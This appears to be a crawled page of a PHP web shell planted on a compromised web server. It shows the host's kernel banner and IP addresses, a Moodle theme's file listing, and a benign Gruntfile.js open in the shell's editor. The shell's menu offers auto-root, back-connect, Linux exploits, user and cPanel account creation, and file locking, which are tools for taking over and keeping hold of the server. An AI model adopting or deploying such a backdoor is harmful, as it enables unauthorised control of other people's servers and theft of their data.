Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.196
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
theme /
moove /
[ HOME SHELL ]
Name
Size
Permission
Action
amd
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
layout
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
pix_core
[ DIR ]
drwxr-xr-x
pix_plugins
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.gitignore
63
B
-rw-r--r--
.stylelintrc
205
B
-rw-r--r--
.travis.yml
953
B
-rw-r--r--
Gruntfile.js
3.33
KB
-rw-r--r--
README.md
1.58
KB
-rw-r--r--
certificates.php
2.08
KB
-rw-r--r--
composer.json
196
B
-rw-r--r--
config.php
5.44
KB
-rw-r--r--
lib.php
13.02
KB
-rw-r--r--
package-lock.json
119.25
KB
-rw-r--r--
package.json
751
B
-rw-r--r--
settings.php
32.53
KB
-rw-r--r--
thirdpartylibs.xml
616
B
-rw-r--r--
version.php
1.53
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Gruntfile.js
/* eslint no-undef: "error" */ /* eslint camelcase: 2 */ /* eslint-env node */ "use strict"; module.exports = function(grunt) { var path = require('path'), PWD = process.env.PWD || process.cwd(); var decachephp = "../../admin/cli/purge_caches.php"; var inAMD = path.basename(PWD) == 'amd'; // Globbing pattern for matching all AMD JS source files. var amdSrc = [inAMD ? PWD + "/src/*.js" : "**/amd/src/*.js"]; /** * Function to generate the destination for the uglify task * (e.g. build/file.min.js). This function will be passed to * the rename property of files array when building dynamically: * http://gruntjs.com/configuring-tasks#building-the-files-object-dynamically * * @param {String} destPath the current destination * @param {String} srcPath the matched src path * @return {String} The rewritten destination path. */ var uglifyRename = function(destPath, srcPath) { destPath = srcPath.replace("src", "build"); destPath = destPath.replace(".js", ".min.js"); destPath = path.resolve(PWD, destPath); return destPath; }; grunt.initConfig({ eslint: { options: {quiet: !grunt.option("show-lint-warnings")}, amd: {src: amdSrc}, yui: {src: ["**/yui/src/**/*.js", "!*/**/yui/src/*/meta/*.js"]} }, uglify: { amd: { files: [{ expand: true, src: amdSrc, rename: uglifyRename }], options: { report: "min", sourceMap: true } } }, watch: { options: { nospawn: true, livereload: true }, amd: { files: ["**/amd/src/**/*.js"], tasks: ["amd", "decache"] }, css: { files: ["scss/**/*.scss"], tasks: ["decache"] } }, stylelint: { scss: { options: {syntax: "scss"}, src: ["*/**/*.scss"] }, css: { src: ["*/**/*.css"], options: { configOverrides: { rules: { "at-rule-no-unknown": true, } } } } }, exec: { decache: { cmd: "php " + decachephp, callback: function(error) { if (!error) { grunt.log.writeln("Moodle theme cache reseted."); } } } } }); // Load contrib tasks. grunt.loadNpmTasks("grunt-contrib-watch"); grunt.loadNpmTasks("grunt-exec"); // Load core tasks. grunt.loadNpmTasks("grunt-contrib-uglify"); grunt.loadNpmTasks("grunt-eslint"); grunt.loadNpmTasks("grunt-stylelint"); // Register CSS taks. grunt.registerTask("css", ["stylelint:scss", "stylelint:css"]); // Register tasks. grunt.registerTask("amd", ["uglify"]); grunt.registerTask("default", ["watch"]); grunt.registerTask("decache", ["exec:decache"]); grunt.registerTask("compile", ["uglify", "decache"]); };
Close